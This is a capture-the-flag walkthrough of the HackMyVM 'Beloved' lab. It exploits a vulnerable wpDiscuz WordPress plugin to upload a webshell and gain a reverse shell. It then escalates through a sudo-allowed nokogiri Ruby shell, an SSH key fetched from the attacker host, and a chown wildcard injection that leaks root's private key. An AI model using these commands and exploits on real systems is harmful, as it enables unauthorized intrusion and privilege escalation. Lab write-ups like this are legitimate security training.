HackMyVm Beloved Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Beloved
Scan for open ports.
~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
| 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_ 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Beloved – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPort 80 is wordpress. Add beloved to /etc/hosts. Search for vulnerabilities.
~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
[+] wpdiscuz
| Location: http://beloved/wp-content/plugins/wpdiscuz/
| Last Updated: 2021-05-15T13:40:00.000Z
| Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
| [!] The version is out of date, the latest version is 7.2.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
| Fixed in: 7.0.5
| References:
| - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
| - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
| - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
|
| Version: 7.0.4 (80% confidence)Search exp for wpdiscuz.
~ searchsploit wpdiscuz fish-0 | 0 [21:19:28]
------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------ ---------------------------------
WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
------------------------------------------------------------------------ --------------------------------Run the POC code.
```
~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/ bash-0 | 0 [12:17:55]
[-] WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
[+] Response length:[51680] | code:[200]
[!] Got wmuSecurity value: 9c794f21e7
[!] Got wmuSecurity value: 1
[+] Generating random name for Webshell...
[!] Generated webshell name: bhgnpbentfvkgzh
[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php";
Visit the webshell, listen to port 1234, we can get a reverseshell.
Check sudo -l.
```
www-data@beloved:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on beloved:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on beloved:
(beloved) NOPASSWD: /usr/local/bin/nokogiriThe nokogiri will activate an ruby shell, but the trick is to add an extra parameter for log file.
www-data@beloved:/$ touch /tmp/log.txt
touch /tmp/log.txt
www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
Your document is stored in @doc...
Switch to inspect mode.
system 'id'
system 'id'
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
system '/bin/bash'Now we are beloved. We upload id_rsa.pub, change to authorzied_keys, to get ssh access.
```
cd .ssh
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-07-02 06:44:36-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
...
chmod 600 authorized_keys
Ssh login as beloved.
~ ssh beloved@192.168.56.100
...
beloved@beloved:~$ id
uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
Check pspy64.
2021/07/02 06:47:01 CMD: UID=0 PID=1878 | /usr/sbin/CRON -f
2021/07/02 06:47:01 CMD: UID=0 PID=1879 | /bin/sh -c cd /opt && chown root:root *
In /opt, there is only a id_rsa. Maybe it's private key for user root. We need to make it readable for user beloved.
```
beloved@beloved:/$ ls -la opt
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:52 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 root root 1823 Jun 27 16:41 id_rsaUse the chown wildcard vulnerability. See the article here.
beloved@beloved:/opt$ touch ref
beloved@beloved:/opt$ touch -- --reference=refWait a minute, the id_rsa has been changed to user beloved, which is the owner of file ref.
```
beloved@beloved:/opt$ ls -la
total 12
drwxrwx--- 2 root beloved 4096 Jul 2 06:59 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
-rw------- 1 beloved beloved 1823 Jun 27 16:41 id_rsa
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:58 ref
-rw-r--r-- 1 beloved beloved 0 Jul 2 06:59 '--reference=ref'
Read id_rsa, then we can login ssh as root.
~ ssh root@192.168.56.100 -i key ...
root@beloved:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
beloved